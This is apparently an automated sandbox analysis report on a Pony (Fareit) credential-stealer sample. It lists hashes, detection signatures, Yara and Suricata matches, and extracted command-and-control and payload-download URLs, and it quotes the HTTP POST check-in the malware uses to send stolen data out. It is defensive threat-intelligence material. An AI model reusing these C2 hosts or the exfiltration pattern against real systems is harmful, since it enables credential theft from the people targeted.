Windows Analysis Report
a5gvJhukP7.exe

Overview

General Information

Sample name: a5gvJhukP7.exe (renamed because the original name is a hash value)
Original sample name: 18579d8151a242cf2e9b69b016479481.exe
Analysis ID: 1528458
MD5: 18579d8151a242cf2e9b69b016479481
SHA1: 051bd937961bad91c2a3074eb39c001e591758d6
SHA256: 2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
Tags: exe, Pony, user-abuse_ch

Detection

Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign process
Machine Learning detection for sample
PE file has a writeable .text section
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (RtlQueryProcessDebugInformation/HeapInformation)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name: EvilPony, Ponyshe
Description: Privately modded version of the Pony stealer.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony

AV Detection

Source: a5gvJhukP7.exe Avira: detected
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack Malware Configuration Extractor: Pony {"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}
Source: a5gvJhukP7.exe ReversingLabs: Detection: 89%
Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: a5gvJhukP7.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree, 1_2_0040A54C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore, 1_2_0040D1E9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree, 1_2_0040CC68
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree, 1_2_0040A94F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA, 1_2_0040BA61
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040421D CryptUnprotectData,LocalFree, 1_2_0040421D
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree, 1_2_0040A391
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree, 1_2_0040A798
Source: a5gvJhukP7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: a5gvJhukP7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00405024
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_00404CB4
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040891F
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_00403FE7
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose, 1_2_0040966C
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose, 1_2_0040879B
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\a5gvJhukP7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49737 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49739 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49887 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Network traffic Suricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:50007 -> 67.215.225.205:8080
Source: Malware configuration extractor URLs: http://209.59.219.70/forum/viewtopic.php
Source: Malware configuration extractor URLs: http://67.215.225.205:8080/forum/viewtopic.php
Source: Malware configuration extractor URLs: http://tokulances.sitebr.net/jV1.exe
Source: Malware configuration extractor URLs: http://ftp.approachit.com/jZy.exe
Source: Malware configuration extractor URLs: http://atualizacoes.issqn.net/FhPD.exe
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 67.215.225.205:8080
Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS
Source: global traffic HTTP traffic detected:
POST /forum/viewtopic.php HTTP/1.0
Host: 67.215.225.205
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 177
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: unknown TCP traffic detected without corresponding DNS query: 67.215.225.205
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00403771 recv, 1_2_00403771
Source: unknown HTTP traffic detected:
POST /forum/viewtopic.php HTTP/1.0
Host: 67.215.225.205
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 177
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://209.59.219.70/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.php
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phpcv
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.app
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://atualizacoes.issqn.net/FhPD.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://ftp.approachit.com/jZy.exe
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://tokulances.sitebr.net/jV1.exe
Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Source: Yara match File source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

System Summary

Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Windows_Trojan_Pony_d5516fe8 Author: unknown
Source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: a5gvJhukP7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1E10 0_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA2110 0_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 0_2_00BA1300 0_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00402D3E 1_2_00402D3E
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00411EE9 1_2_00411EE9
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA2110 1_2_00BA2110
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1E10 1_2_00BA1E10
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: 1_2_00BA1300 1_2_00BA1300
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00410514 appears 40 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00404192 appears 50 times
Source: C:\Users\user\Desktop\a5gvJhukP7.exe Code function: String function: 00401BB8 appears 139 times
Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000000.1658498912.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe Binary or memory string: OriginalFilename vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe, 00000001.00000000.1704943301.0000000000BAB000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe Binary or memory string: OriginalFilenameNOD32, vs a5gvJhukP7.exe
Source: a5gvJhukP7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
Source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
